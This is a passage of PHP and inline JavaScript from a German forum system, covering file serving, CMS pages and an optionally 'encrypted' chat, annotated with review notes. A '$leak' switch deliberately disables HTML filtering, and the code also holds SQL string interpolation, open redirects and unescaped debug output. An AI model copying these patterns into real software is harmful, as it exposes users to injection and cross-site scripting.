# Access: users whose status passes $status/2%2 (presumably admins) get any file; everyone else only
# files whose status bit 0 is set, or any file once logged in - and, when addressing by id alone,
# only their own files.
# Result: the file, 401 when the row exists but is not accessible, 404 when there is no such row.
if($request == 'file'
and ( preg_match('/^(\d+)(?:-([\w!,.-]+))?/',$query,$var)
or ($var[1] = $mid) and $var[2] = $query))
if($file = $sql['aq']($conn,"
select c.id as id,
a.name as name,
ifnull(ifnull(a.type,b.type),'application/octet-stream') as type,
ifnull(a.size,b.size) as size,
ifnull(a.data,b.data) as data,
strftime('%s',ifnull(a.[create],b.[create])) as time
from [file] as a
left join [file] as b on a.link = b.id
left join [user] as u on a.user = u.id
left join [file] as c on a.id = c.id".(($status/2%2) ? "" : " and (c.status%2 = 1 or c.status%2 = 0 and '$uid' != '')")."
where ".((!@$var[2]) ? (($status/2%2) ? "" : "a.user = ".(int)$uid." and ")."a.id = ".(int)$var[1]
: "a.user = ".@(int)$var[1]." and a.name like '".@$sql['es']($var[2])."'")."
order by a.id desc, a.name
limit 1",SQLITE_ASSOC))
if($file[0]['id']) {
// Conditional GET: the creation time serves as ETag and Last-Modified; answer 304 when both
// validators sent by the client match
if($cache) {
$time = $file[0]['time'];
$date = gmdate("D, d M Y H:i:s",$time)." GMT";
header("Cache-Control: public");
header("Etag: $time");
if(($val=(function_exists("apache_request_headers")) ? apache_request_headers() : array())
and isset($val["If-None-Match"]) and isset($val["If-Modified-Since"])
and $val["If-None-Match"] == $time and $val["If-Modified-Since"] == $date
or isset($_SERVER["HTTP_IF_NONE_MATCH"]) and isset($_SERVER["HTTP_IF_MODIFIED_SINCE"])
and $_SERVER["HTTP_IF_NONE_MATCH"] == $time and @$_SERVER["HTTP_IF_MODIFIED_SINCE"] == $date) {
header("HTTP/1.1 304 Not Modified");
exit();
}
header("Pragma: public");
header("Last-Modified: $date");
header("Cache-Control: public, max-age=".($eos*60));
}
// NOTE(review): content type and file name come straight from the stored row and the file is served
// inline from the forum's own origin. Whether the upload code restricts types is not visible here;
// if it does not, a stored HTML or script file would run in the site's origin. Forcing an
// attachment disposition and sending X-Content-Type-Options: nosniff would be the hardened form.
// NOTE(review): "Cache-Control: public" is also sent for files that need a login.
header("Content-Type: ".$file[0]['type']);
header("Content-Length: ".abs($file[0]['size']));
header('Content-Disposition: filename="'.$file[0]['name'].'"');
// Data is stored base64-encoded; a size that is not above zero marks data that must also be inflated
die((($var = base64_decode($file[0]['data']) and $file[0]['size'] > 0) ? $var : $gz['inflate']($var)));
}
else {
header('HTTP/1.0 401 Unauthorized');
die("<h1>Datei benötigt Benutzeranmeldung!</h1>");
}
else {
header('HTTP/1.0 404 File Not Found');
die("<h1>Datei nicht gefunden!</h1>");
}
# Disable the forum for external addresses without login
# With $inet off, visitors that are neither logged in nor local ($local is set outside this block)
# only get the imprint page.
if(!$inet and !$uid and !$local)
$request = 'Impressum';
# Provide/output static or dynamic content
# $content[$request] (set outside this block) wins; otherwise the CMS table is searched for a page
# named like the request whose access level fits the visitor's status. A page whose content is the
# name of another page is resolved through the self-join (r).
# NOTE(review): $request is interpolated into the LIKE pattern without $sql['es']; where $request is
# derived from the URL is outside this block - confirm that it cannot contain a quote character.
if($content = (isset($content[$request])) ? $content = $content[$request] : (($request and !isset($_REQUEST['nocms']) or !count($_GET) and !count($_POST)) ? $sql['aq']($conn,"
select ifnull(r.content,ifnull(c.content,'')) as '.content',
strftime('%s',ifnull(r.change,c.change)) as change,
strftime('%s',ifnull(r.[create],c.[create])) as 'create',
ifnull(r.id,c.id) as id,
ifnull(r.name,c.name) as name,
ifnull(r.description,c.description) as title,
ifnull(ifnull(r.status,c.status)/2%4,'-1') as right,
(select username from user where status/2%2 = 1) as 'from',
'cms' as type
from [cms] as c
left join [cms] as r on r.name like c.content
where c.name like '".preg_replace('/^(Abmelden)$/','',$request)."' and c.status/2%4 <= ".($status/2%2 + $status%2*2),SQLITE_ASSOC) : false)) {
if(is_array($content) and $var = reset($content)) {
header('Last-Modified: '.date('r',$var['change']));
// NOTE(review): the page description is placed into the attribute without escaping
$head['cms'] = "<meta name='description' content='$var[title]' />";
if($var['right'] == 2 or $status/2%2)
$uedit = "CMS?id=$var[id]";
$creolevar = array_merge($creolevar,$var);
$content = $var['.content'];
}
// A page that consists of a single URL-like token is answered with a redirect to that target.
// NOTE(review): absolute http(s) targets are accepted, so anyone able to edit CMS pages can
// redirect visitors to another site; the target is also written unescaped into the fallback HTML.
if(preg_match('!^(https?://|/|\.|#|::(?=l\/))[^<\s\'>]+$!',$content,$var)) { // link redirect
if($var[1] == '::')
$content = strtr($content,array('::l' => $self, '::L' => $Self));
header("Location: $content");
die("<html><head><meta http-equiv='refresh' content='0; URL=$content' /><title>$content</title></head>
<frameset><frame src='$content' /><noframes><body><script type='text/javascript'><!--
top.location.href='$content';//--></script><noscript><a href='$content'>$content</a></noscript></body></noframes></frameset></html>");
}
// Render through the Creole rules. With $leak off the text is mapped through $html (minus its
// first entry) first; with $leak on that mapping is skipped, so markup in the page reaches the browser.
if($content)
$out .= "<div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),(($leak) ? $content : strtr($content,array_slice($html,1))))."</div>";
$request .= " ";
}
# Datenbank beschreibbar
if($rw) {
# Pre-chatline: log users off once their idle time has expired & clean up
# Runs on every request while the database is writable. Three statements in one call:
#  1. clear the online bit and the chat channel of users idle for more than $eos minutes,
#  2. reset the chat field of one user whose chat partner is no longer in a chat,
#  3. delete the messages of one chat channel that has no participant left.
# With $leak on, step 2 does not require the partner row to have a status above 0.
$sql['e']($conn,"
update [user] set status = (status/2%8*2), -- Autologoff
chat = null
where status = (status/2%8*2+1)
and datetime(change,'+$eos minutes') < datetime('now','localtime')
and status is not null;
update user set [chat] = null -- Aufraeumen
where id = ( select a.id
from [user] as a
left join [user] as b on a.chat = b.id".(($leak) ? "" : " and b.status > 0")." -- Chatpartner noch Online (Moeglicher Fehler: > 0)
where a.status is not null and a.chat > 0 and b.chat is null -- Chatter nicht gesperrt und noch Online (Moeglicher Fehler: > 0)
limit 1); -- und Chatpartner nicht im Chat
delete from [chat]
where chat = (select a.chat -- chatkanal
from [chat] as a
left join [user] as b on a.chat = b.chat -- Teilnehmer des Chatkanals
or a.chat <= 0 and a.user = b.id and status%2 = 1 -- Teilnehmer ist online
or abs(a.chat) = b.id and a.chat != b.id and (b.chat is null and status%2 = 1 or b.chat = b.id)
where b.id is null -- Keins der Bedingungen trifft zu!
group by a.chat
limit 1)");
# Chatline
if($request == 'Chat' and !$lone and $uid and $status%2) {
// $wait stays false for the script-driven chat; the NoScript variant sets it to a refresh interval
$wait = false;
// Chat responses must never be cached: send the three headers and mirror them as <meta> tags
foreach($array = array( // switch the browser cache off completely
'Cache-Control' => 'no-cache, no-store, must-revalidate',
'Pragma' => 'no-cache',
'Expires' => '0') as $key => $var) {
header("$key: $var");
$head[] = "<meta http-equiv=\"$key\" content=\"$var\" />";
}
if(isset($_REQUEST['chat']) and preg_match('/^(auth|call|edit|news|quit|send|sign|user|html)(?::(.*))?$/',$_REQUEST['chat'],$chat)) {
#html
if($chat[1] == 'html') { // Chatline ohne JavaScript
$wait = (isset($_REQUEST['wait']) and preg_match('/^\d{1,3}$/',$_REQUEST['wait'],$var) and $var[0] >= 30) ? $var[0] : 30;
if($status/8%2) // Verschlüsselung abschalten
$sql['e']($conn,"update user set status = status%8 where id = $uid");
if(isset($_REQUEST['edit']) and preg_match('/^[01]$/',$_REQUEST['edit'],$var) and $var[0] != $status/4%2) // edit
$chat = array(0,'edit',$var[0]);
elseif(isset($_REQUEST['call']) and isset($_REQUEST['user']) and isset($_REQUEST['line'])
and preg_match('/^\d+,.*$/',"$_REQUEST[user],$_REQUEST[line]",$var)) // call
$chat = array(0,'call',$var[0]);
elseif(isset($_REQUEST['quit'])) // quit
$chat[1] = 'quit';
elseif((isset($_REQUEST['send']) or isset($_REQUEST['doit'])) and isset($_REQUEST['line']) and $_REQUEST['line'] != '') // send
$chat = array(0,'send',$_REQUEST['line']);
elseif($var = $sql['aq']($conn,"select user,text from [chat] where chat = -$uid limit 1")) // auth
$chat = array(0,'auth',(($status/4%2 and !preg_match('/^key:\w+:/',$var[0]['text'])) ? '' : '-').$var[0]['user']);
}
else
$out = 0;
#user
if($chat[1] == 'user') // Userstatus übermitteln
$out = implode(",",$sql['sq']($conn, /* id:status,chat,users; ... */ "
select u.id||','||ifnull(c.status,u.status)
from [user] as u
left join [user] as c on u.chat = c.chat
where u.status is not null
group by u.id"));
#edit
elseif($chat[1] == 'edit' and @preg_match('/^[013457]$/',$chat[2]) and $sql['e']($conn, /* Eigenen Chatstatus bearbeiten */"
update [user] set
status = status%4+(($chat[2]%2 + $chat[2]/4%2*2)*4)
where id = $uid"))
$out = $sql['c']($conn);
#auth
elseif($chat[1] == 'auth' and preg_match('/^(-?\d+)(?:,(\w+),([=\w\/+]+))?$/',$chat[2],$var) and $sql['e']($conn, /* Chat Erlauben */"
update [user] set
chat = ".(($var[1] < 0) ? 'null' : 'chat*-1')."
where abs(chat) = $uid and id = abs($var[1]);".(($var[1] < 0) ? "
delete from [chat]
where chat = -$uid and user = abs($var[1])" : "
update [user] set
chat = id
where chat is null and id = $uid;
update [chat] set
chat = abs(chat)
where chat = -$uid and user = abs($var[1])".((count($var) > 3) ? ";
insert into [chat] (chat,user,time,text) values ($uid,$var[1],datetime('now','localtime'),'key:$var[2]/$var[3]:')" : ""))))
$out = $sql['c']($conn);
#send/sign
elseif(($chat[1] == 'send' or $chat[1] == 'sign' and $status/2%2) and @preg_match('/^.+$/',$chat[2]) and $sql['e']($conn, /* Nachricht Senden */ "
insert into [chat] (chat,user,time,text) values (".(($chat[1] == 'send') ? $sql['sq']($conn,"select chat from [user] where id = $uid") : 0).",$uid,datetime('now','localtime'),'".$sql['es'](preg_replace('/%([\da-f]{2})/ei','chr(hexdec("$1"))',((preg_match('!^[\w+/]+=*$!',$chat[2]) or !$leak) ? strtr($chat[2],$html) : @preg_replace(array_keys($creole),array_values($creole),strtr($chat[2],$html)))))."')"))
$out = $sql['c']($conn);
#call
elseif($chat[1] == 'call' and preg_match('/^(\d+),?(.*)$/',$chat[2],$val) and ($var = $sql['sq']($conn,/* Chat beginnen */"
select ifnull(b.chat,a.id)
from user as a
left join [user] as b on b.chat = a.chat
left join ( select d.id,
count(d.chat) as chats
from user as d
left join user as e on d.chat = e.chat
group by d.id) as c on c.id = a.id
where (b.status%2 and b.status/4%2
or b.id is null and a.status%2 and a.status/4%2
or a.id = b.id and c.chats = 1) and a.id = $val[1]
limit 1")) !== false) // Botnet Workaround für Antworten
$out = $sql['e']($conn,"
update [user] set
chat = '-".intval($var)."'
where chat is null and id = $uid;
insert into [chat] (chat,user,time,text) values ('-".intval($var)."',$uid,datetime('now','localtime'),'".$sql['es'](preg_replace('/%([\da-f]{2})/ei','chr(hexdec("$1"))',$val[2]))."');");
#quit
elseif($chat[1] == 'quit' and $val = reset(($sql['aq']($conn, /* Chat beenden */ "
select a.chat as chat,count(b.id) as users
from [user] as a
left join [user] as b on a.chat = b.chat
where a.id = $uid
group by a.id")))) {
$sql['e']($conn, /* Offene Chatanfragen löschen */ "
delete from [chat]
where user = $uid and chat < 0");
if(($val['chat'] and $val['chat'] != $uid or $val['users'] and $val['users'] < 3)) // Nur den Client oder beide beim Privaten Chat
$sql['e']($conn,"
update [user] set
chat = null
where chat = $val[chat]".(($val['users'] < 3) ? "" : " and id = $uid"));
elseif($val['chat'] == $uid and $var = $sql['sq']($conn,"select id from [user] where chat = $val[chat] and id != $uid limit 1")) // Master ersetzen
$sql['e']($conn,"
update [user] set
chat = null
where id = $uid;
update [user]
set chat = $var
where chat = $val[chat];
update [chat] set
chat = $var
where chat = $uid");
$out = 1;
}
#news
elseif($chat[1] == 'news' and @preg_match('/\d*/',$chat[2])) { // Query the current chat news
// Chat command "news[:<last id>]". The reply is one ';'-separated record:
// the counters selected below (comma-separated), the newest message id, the
// number of new messages and then one "user,time,text" entry per message.
// NOTE(review): '/\d*/' is unanchored and also matches the empty string, so it
// accepts any value; the number is only enforced by intval() further down.
// $uid is interpolated into the SQL unquoted - presumably an integer taken from
// the session; verify where it is set (not visible in this excerpt).
$var = $sql['aq']($conn,"
select count(a.id), -- 0 Anzahl User
count(nullif(a.status%2,0)), -- 1 Anzahl der Logins
count(nullif(a.status/4%2,0)), -- 2 Anzahl der Chatter
count(nullif(a.status/8%2,0)), -- 3 Anzahl der Chatter
count(a.chat), -- 4 Anzahl der Chats
ifnull(sum(a.chat),0), -- 5 Hash der Chats
count(b.id), -- 6 Anzahl der Masters
ifnull((select chat from [user] where id = $uid),'-'), -- 7 Eigene Chat-ID
ifnull((select id from user where chat != $uid and abs(chat)=$uid limit 1),'-') -- 8 Erste ID von Chatanfrage(n)
from [user] as a
left join [user] as b on a.id = b.id and b.id = b.chat
where a.status is not null",SQLITE_NUM);
// '%' and ';' are hex-escaped because ';' separates the fields of the reply.
// The /e modifier evaluates the replacement as PHP code; the pattern can only
// match one of those two characters here. /e was removed in PHP 7.0
// (preg_replace_callback is the replacement), so this line fails there.
if($val = intval($var[0][8])) ## 9: first text of the pending chat request(s)
$var[0][] = preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$sql['sq']($conn,"select text from chat where user = $val and chat = -$uid limit 1"));
// From here on $val is the client's last seen message id, forced to an integer.
$val = (isset($chat[2])) ? intval($chat[2]) : 0;
$wrt = intval($var[0][7]); // Chat id of the caller (0 when not in a chat)
$out = implode(',',$var[0]).";";
$var = $sql['sq']($conn,"select ifnull(max(id),'0') from chat where chat = $wrt or chat = '0'"); // 1: highest chat message id
$out .= "$var;";
// Only integers ($wrt, $val) are spliced into the statement below.
if(isset($chat[2]) and $var > $val and $array = $sql['aq']($conn, /* 2: number of messages */ "
select user,strftime('%Y%m%d%H%M%S',time) as time,text
from [chat]
where (".(($wrt) ? "chat = $wrt or " : "")."chat = '0') and id > $val" /* Do not show chat requests (author's note: leaves a hack possible) */."
order by id") and count($array)) {
$out .= count($array);
// The message text is sent as stored, with only '%' and ';' escaped; any HTML
// filtering is left to the receiving script.
foreach($array as $var)
$out .= ";$var[user],$var[time],".preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$var['text']);
}
else
$out .= "0;";
}
#end
// Any of these chat commands counts as user activity: the row's change
// timestamp is refreshed and its request counter incremented.
// The pattern is unanchored, so the keyword may appear anywhere in $chat[1].
if(preg_match('/call|edit|quit|send|sign/',$chat[1])) // Reset the user lifetime
$sql['e']($conn,"
update [user] set
change = datetime('now','localtime'),
requests = requests+1
where id = $uid");
if($wait) { // Output the chat as HTML (NoScript)
// Fallback for browsers without JavaScript: the last ten messages of the
// caller's current chat are rendered as a page that reloads itself.
$out = '';
if($chat = $sql['sq']($conn,"select chat from [user] where id = $uid")) {
$array = $sql['aq']($conn,"
select ifnull(u.username,'Unbekannt') as user,strftime('%d.%m.%Y %H:%M:%S',c.time) as time,c.text as text
from [chat] as c
left join [user] as u on u.id = c.user
where c.chat = $chat
order by c.time desc
limit 10");
// The user name is written into the markup as returned by the query; the text
// goes through strtr() with $html minus its first entry.
// NOTE(review): $html is defined elsewhere - confirm which characters it maps
// and that user names are HTML-safe when they are stored.
foreach($array as $key => $var)
$array[$key] = "<p><fieldset class='cr'><legend><b>$var[user]</b> <small>($var[time])</small></legend><div>".strtr($var['text'],array_slice($html,1))."</div></fieldset></p>";
$out = implode("\n",$array);
}
@header('Content-Type: text/html; charset=utf-8');
// NOTE(review): $wait and $self are interpolated into the meta refresh
// attribute; confirm that $wait is numeric where it is set.
$out = "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2//EN\">" /* 4.01 Transitional */ ."
<html lang=\"de\"><head><title>NoScript Chatline</title>
<meta http-equiv='refresh' content='$wait; URL=$self/Chat?chat=html:".time()."&wait=$wait' />
<meta http-equiv='content-type' content='text/html; charset=utf-8' />\n</head><body>".strtr($out,$uml)
// Debug footer: shown when ($leak is on or status bit 2 is set) and the
// 'debug' cookie is non-empty. print_r($_REQUEST) is written into the page
// without HTML escaping, so request values are echoed as markup.
.((($leak or $status/2%2) and isset($_COOKIE['debug']) and $_COOKIE['debug']) ? "<hr />".date('d.m.Y H:i:s')
."<pre>".print_r($_REQUEST,true).((isset($debug)) ? print_r($debug,true) : '')."</pre>" : "")."</body></html>";
}
else
header('Content-Type: text/plain');
die("$out"); // Emit the result and end the request
}
// $a becomes the JavaScript literal that the chat script assigns to F:
// [prime, main, base]; base is used there as the radix for bigInt parsing.
// When $jschat['main'] is empty it is derived from the prime by ROT13, string
// reversal and dropping the first character.
// NOTE(review): no validation of these parameters is visible here.
if(is_array($jschat) and is_array($jschat['crypt'])) { // Prepare the encrypted chat
foreach($jschat['crypt'] as $key => $var)
$head["chat.$key"] = "<script type='text/javascript' language='javascript' src='$var'></script>";
$a = "['$jschat[prime]','".(($jschat['main']) ? $jschat['main'] : substr(strrev(str_rot13($jschat['prime'])),1))."',$jschat[base]]";
}
else
$a = 'false';
$rows = $sql['aq']($conn, /* Build the chat GUI */ "
select id,username
from [user]
where status is not null
order by username");
// One <option> per active user. The user name is inserted as stored.
// NOTE(review): confirm that user names are HTML-safe when they are written.
foreach($rows as $key => $var)
$rows[$key] = "<option value='$var[id]'>$var[username]</option>";
// Radio buttons for incoming chat requests: 0 reject, 1 allow, 3 show (ask).
// Option 3 starts hidden; the chat script reveals it. The preselection
// compares status bit 4 with the option key.
$val = array(0 => 'Ablehnen', 1 => 'Erlauben', 3 => 'Zeigen');
foreach($val as $key => $var)
$val[$key] = "<span id='sr$key'".(($key == 3) ? " style='display:none'" : "")."><input type='radio' name='edit' id='r$key' onclick='cl(2,$key)' value='$key' ".(($status/4%2 == $key) ? "checked " : "")."/><label for='r$key'>$var</label></span>";
// Chat GUI: builds the <form name='chat'> markup and its inline script as one
// string in $var. The script source is passed through preg_replace($js,'',...)
// ($js is defined elsewhere - presumably it strips comments/whitespace; verify).
// Values the server splices into the script: $self, $uid, $a (-> F), $lock and
// fragments that depend on $leak and on status bit 2 (the registration code
// gives that bit to the first user and marks it as admin).
// Review notes on the client code, for readers auditing or hardening it:
//  - cl(10) renders every message through innerHTML. With $leak off, the tag
//    filter in v removes all tags except a fixed list of attribute-less inline
//    elements. With $leak on, the .replace(v,'') call is left out, so message
//    markup reaches innerHTML as received (one of the deliberate weaknesses
//    behind the $leak switch). Sender name and time are inserted without that
//    filter in both modes.
//  - The key material of the encrypted chat is kept in window.name as
//    key:<secret>,<public>,<chat key>. window.name has historically survived
//    navigation within the same tab, so it is not a confidential store.
//  - Key agreement is modPow over the parameters in F (Diffie-Hellman style);
//    no authentication of the peer's public value is visible here. The chat
//    key is an MD5 over secret, user agent and clock, and message integrity is
//    an MD5 over key and plaintext. Treat it as a teaching construction, not
//    as vetted cryptography.
//  - When ($leak or status bit 2) and the 'debug' cookie are set, every chat
//    request and its response are passed to jsdebug().
//  - Requests use synchronous XMLHttpRequest (third argument false).
$var = "<form name='chat' method='post' action='$self/Chat' target='nschatline' onsubmit='cl(6,0);return false'><fieldset><legend><b>".((isset($_GET['nojs'])) ? "Chatline" : "<a href='$self/Chat?nojs' title='Chat ohne JavaScript und ohne Verschlüsselung'>Chatline</a>")."</b></legend>
<noscript><iframe src='$self/Chat?chat=html' style='width:100%;height:50%' name='nschatline'></iframe></noscript>
<input type='hidden' name='chat' value='html' /><input type='hidden' name='copy' value='' /><input type='submit' name='doit' style='display:none' />
<div id='view' style='width:100%;height:400;overflow-y:auto;display:none'></div>
<table width='100%'><tr><td><input type='text' name='line' value='' size='80' style='width:100%' /></td>
<td width='1%'><input type='submit' name='send' value='Senden' /></td></tr></table>
<table width='100%'><tr><td>Chat mit <select size='1' name='user' onchange='cl(3,this.value)'><option value='-'>Bitte wählen...</option>
<option value='0' style='display:none' disabled>Alle Benutzer</option>".implode("",$rows)."</select>
<input type='submit' name='call' value='Verbinden' onclick='cl(4,B.user.value+\",\"+line.value);return false' />
<input type='submit' name='quit' value='Trennen' onclick='cl(5,0);return false' /></td>
<td align='center'><span onclick='cl(7,0)'>Refresh: </span> <select size='1' name='wait'>"
// Refresh intervals: "h" marks an option hidden until the script enables it,
// "s" the preselected one. The /e modifier evaluates the replacement as PHP;
// the subject is a constant string here. /e was removed in PHP 7.0
// (preg_replace_callback is the replacement).
.preg_replace('/(\d+)(h?)(s?)/e','"<option value=\'$1\'".(("$2") ? "style=\'display:none\' disabled" : "")
.(("$3") ? "selected" : "").">$1</option>"','3h 5h 10h 15h 20 30s 45 60 90 120')."</select> Sek.</td>
<td align='right'><span id='cryptchat' style='display:none'><label for='crypt'>Verschlüsselung:</label>
<input type='checkbox' id='crypt' name='crypt' value='1' onclick='cl(9,this.checked)' ".(($status/8%2) ? "checked " : "")."/></span> Chatanfragen: "
.implode("\n",$val)."</td></tr></table></fieldset>
<script type='text/javascript'><!--\n".preg_replace($js,'',"
function cl(x,y) { // Omni Chat-Function (x -> Mode / y -> Parameter)
switch(x) {
case 0: // 0:Exclusic-Oder für IE6
return (y[0] || y[1]) && !(y[0] && y[1]);
case 1: // 1:Per Ajax Chat-Kommandos abschicken
if(A) {
A.open('POST',location.pathname,false);
A.setRequestHeader('Content-type','application/x-www-form-urlencoded');
A.send('chat=' + encodeURIComponent(y)); // Absenden".((($leak or $status/2%2) and isset($_COOKIE['debug']) and $_COOKIE['debug']) ? "
jsdebug(y + '\\x20->\\x20' + A.responseText); // Chat-Requests Debugen" : "")."
return A.responseText
}
return false;
case 2: // 2:[edit] Chatstatus ändern
cl(1,'edit:' + (y + B.crypt.checked * 4));
break;
case 3: // 3:User auswählen
if(parseInt(y,10))
B.call.disabled = false,
B.call.style.display = 'inline';
else
B.call.disabled = true,
B.call.style.display = 'none';".(($status/2%2) ? "
if(y == 0)
B.line.disabled = false,
B.send.disabled = false,
B.doit.disabled = false;
else {
B.send.disabled = true,
B.doit.disabled = true;
if(y > 0) {
B.line.disabled = false;
B.line.focus();
}
else
B.line.disabled = true;
}" : "
if(y > 0) {
B.line.disabled = false;
B.line.focus();
}
else
B.line.disabled = true;")."
break;
case 4: // 4:[call] Chat mit User beginnen
if(y && cl(1,'call:' + ((F && B.crypt.checked && (z = window.name.match(/^key:\w+,(\w+),[\w-]+$/))) ? y.replace(/,/,',key:' + z[1] + ':') : y)) != 0)
B.call.disabled = true,
B.call.style.display = 'none',
B.user.disabled = true,
B.line.disabled = true,
B.quit.disabled = false,
B.quit.style.display = 'inline',
B.crypt.disabled = true;
cl(8,0);
break;
case 5: // 5:[quit] Chat beenden
cl(1,'quit');
B.call.disabled = false,
B.call.style.display = 'inline',
B.user.disabled = false,
B.quit.disabled = true,
B.quit.style.display = 'none',
B.crypt.disabled = false,
window.name = window.name.replace(/\w+$/,'-');
cl(8,0);
break;
case 6: // 6:[sign|send] Nachricht Senden
if(cl(1,".(($status/2%2) ? "((B.user.value == 0) ? 'sign' : 'send')" : "'send'")." + ':' + ((F && (z = window.name.match(/(\w+)$/)))
? CryptoJS.MD5(z[1] + ',' + B.line.value) + '/' + CryptoJS.AES.encrypt(B.line.value,z[1]).toString().replace(/([^=])$/,'$1=')
: B.line.value.replace(/%/g,'%25').replace(/&/g,'%26').replace(/=/g,'%3D').replace(/\?/g,'%3F'))) != 0)
B.line.value = '';
B.line.focus();
cl(8,0);
break;
case 7: // 7:Formulare Initialisieren edit
if(!C)
C = cl(1,'news').split(';'); // Universale Infos abholen
x = [];
y = cl(1,'user').split(','); // Chat-User Infos abholen
for(z=0;z<y.length;z+=2) // User-Infos aufbereiten
x[y[z]] = y[z+1];
y = B.user.getElementsByTagName('option'); // User-Liste aktualisieren
for(z=1;z<y.length;z++)
if(".(($status/2%2) ? "y[z].value == 0 || " : "")."(w = x[parseInt(y[z].value,10)]) && y[z].value != $uid && w%2)
y[z].style.display = 'block',
y[z].disabled = (".(($status/2%2) ? "y[z].value == 0 || " : "")."(Math.floor(w/4)%2) && (Math.floor(w/8)%2) == B.crypt.checked) ? false : true;
else
y[z].style.display = 'none',
y[z].disabled = true;
w = C[0].split(','); // Chat Status ermitteln
if(w[7] != '-') // Verbinden mit einen User
B.quit.disabled = false, // Im Chat
B.quit.style.display = 'inline',
B.call.disabled = true,
B.call.style.display = 'none',
B.user.disabled = true,
B.crypt.disabled = true;
else {
B.quit.disabled = true, // Kein Chat
B.quit.style.display = 'none',
B.user.disabled = false,
B.crypt.disabled = false,
window.name = window.name.replace(/\w+$/,'-');
if(parseInt(B.user.value,10))
B.call.disabled = false,
B.call.style.display = 'inline';
else
B.call.disabled = true,
B.call.style.display = 'none';
}
u = document.getElementById('view');
if(w[7] > 0) { // Chat mit User gestartet
if(B.send.disabled)
u.innerHTML = '',
B.line.value = '';
u.style.backgroundColor = '#ffffff',
B.line.disabled = false,
B.send.disabled = false,
B.doit.disabled = false;
B.line.focus();
}
else // Chat mit User beendet
u.style.backgroundColor = '#eeeeee',
B.line.disabled = ((parseInt(B.user.value,10) > 0 && !B.call.disabled) ? false : true),
B.send.disabled = true,
B.doit.disabled = true;
break;
case 8: // 8:[news] Ereignisse Abfragen/Auswerten
v = y;
if(B.line.value == B.copy.value) {
E = cl(1,'news:' + E).split(';');
if(E.length == 1 && E[0] == '0') // User noch Online?
location.reload();
w = C[0]; // Alten Chat-Status retten
C = E; // Chat-Status aktualisieren
E = E[1]; // Letzte ID
if(w != C[0]) // Es gab Änderungen an den laufenden Chats
cl(7,0);
w = C[0].split(','); // Chat Erlauben/Ablehnen
u = window.name.match(/^key:(\w+),(\w+),([\w-]+)$/); // Eigene Keys (Secret-Key,Public-Key,Chat-Key)
if(w[8] != null && w[8] != '-') { // Chatanfrage bekommen
z = w[9].match(/^(?:key:(\w+):)?(.*)$/), // Public-Key vom Chat-Partner
w = w[8];
if(!cl(0,[!(typeof z[1] == 'undefined' || z[1] == ''),B.crypt.checked])
&& (B.edit[1].checked || B.edit[2].checked && confirm('Chatanfrage von:\\x20' + cl(11,w) + '\\n' + unescape(z[2])))) { // Probleme mit IE6
if(F && B.crypt.checked && z[1] && u) {
if(u[3] == '-')
window.name = window.name.replace(/-$/,(u[3] = CryptoJS.MD5(u[1] + navigator.userAgent + new Date().getTime())));
w += ',' + u[2] + ',' + CryptoJS.AES.encrypt('key:' + u[3] + ';',bigInt(z[1],F[2]).modPow(bigInt(u[1],F[2]),bigInt(F[0],F[2])).toString(F[2]));
}
}
else {
if((B.edit[1].checked || B.edit[2].checked) && cl(0,[!(typeof z[1] == 'undefined' || z[1] == ''),B.crypt.checked])) // Probleme mit IE6
cl(10,'Intern,0,<h4>' + ((z[1]) ? 'V' : 'Unv') + 'erschlüsselte Chatanfrage von:\\x20' + cl(11,w)
+ '\\x20abgelehnt!\\x20-\\x20Verschlüsselung ist ' + ((B.crypt.checked) ? 'ein' : 'aus') + 'geschaltet!<\/h4>' + unescape(z[2]));
w = '-' + w;
}
cl(1,'auth:' + w);
}
if(parseInt(C[2],10)) // Neu Nachrichten Anzeigen/Ausgeben
for(z=3;z<C.length;z++)
if((w = C[z].match(/^(\d+),(\d{4})(\d\d)(\d\d)(\d{6}),(?:key:(\w+)\/?([\/\w+=]*):)?([^\\0]*)$/))) {
if(F && u && w[6] && w[7] && w[1] == $uid && u[3] == '-') { // Schlüssel zum Entschlüsseln dabei?
u[3] = CryptoJS.AES.decrypt(w[7],bigInt(w[6],F[2]).modPow(bigInt(u[1],F[2]),bigInt(F[0],F[2])).toString(F[2]));
u[3] = String((String(u[3]).match(/^key:\w+;$/)) ? u[3] : u[3].toString(CryptoJS.enc.Latin1)).replace(/^key:(\w+);$/,'$1');
window.name = window.name.replace(/-$/,u[3]);
}
if(w[8] != '') // Leere Nachrichten überspringen
cl(10,cl(11,w[1]) + ',' + w[4] + '.' + w[3] + '.' + w[2] + ' ' + w[5].replace(/(\d\d)(?=\d)/g,'$1:')
+ ((F && u && u[3] != '-' && w[8].match(/^[\/\w+]+=+$/) && (x = w[8].match(/^(\w+)\/(.*)$/))) ? '!,'
+ (((y = CryptoJS.AES.decrypt(x[2],u[3]).toString(CryptoJS.enc.Utf8)) && CryptoJS.MD5(u[3] + ',' + y) == x[1])
? y : '<h3>Verschlüsselung fehlgeschlagen:<\/h3>' + x[2]) : ',' + unescape(w[8])));
}
}
else
B.copy.value = B.line.value;
if(v)
setTimeout('cl(8,1)',parseInt(B.wait.value,10)*1000);
break;
case 9: // 9:[edit/crypt] Ereignisse Abfragen/Auswerten
v = y;
if(y && !window.name.match(/^key:\w+,\w+,[\w-]+$/)) {// key:<secret-key>,<public-key>,<crypt-key>
try {
x = bigInt(F[0],F[2]); // prime als bigInt
y = bigInt(F[1],F[2]); // main als bigInt
z = bigInt.randBetween(y,x); // Secret-Key
window.name = 'key:' + z.toString(F[2]) + ',' + y.modPow(z,x).toString(F[2]) + ',-';
// alert('Neue Schluessel wurden erzeugt!');
}
catch(y) { // Verschlüsselung macht fehler
v = 0;
B.crypt.checked = false;
alert('Computer sagt NEIN!');
}
}
cl(1,'edit:' + ((B.edit[0].checked * 0 + B.edit[1].checked * 1 + B.edit[2].checked * 3) + v * 4)); // Neuen Status zum Forum schicken
cl(7,0); // GUI aktualisieren
break;
case 10: // 10:Inhalte Ausgeben
y = y.match(/([^,]+),([^,]+?)(!?),([^\\0]+)/);
v = /<(?!\/?(big|br|code|del|em|ins|small|strong|su[bp]|tt".(($leak) ? "|a|font|img|iframe|span)\W" : ")>").")[^\>]*>/g; // Whitelist für HTML-Inline
x = [document.getElementById('view'),document.createElement('p'),'<b>' + y[1] + '<\/b>\\x20<small>(' + ((y[2] != 0) ? y[2] : new Date().toLocaleString()) + ')<\/small>'
